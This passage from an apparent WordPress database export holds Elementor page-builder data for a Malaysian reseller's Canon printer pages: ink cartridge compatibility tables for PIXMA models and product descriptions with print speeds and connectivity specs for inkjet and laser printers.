Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6960,3307,'_elementor_version','2.5.14'),(7045,3320,'_wp_page_template','template-fullwidth.php'),(7046,3320,'_elementor_edit_mode','builder'),(7047,3320,'_elementor_template_type','post'),(7048,3320,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile 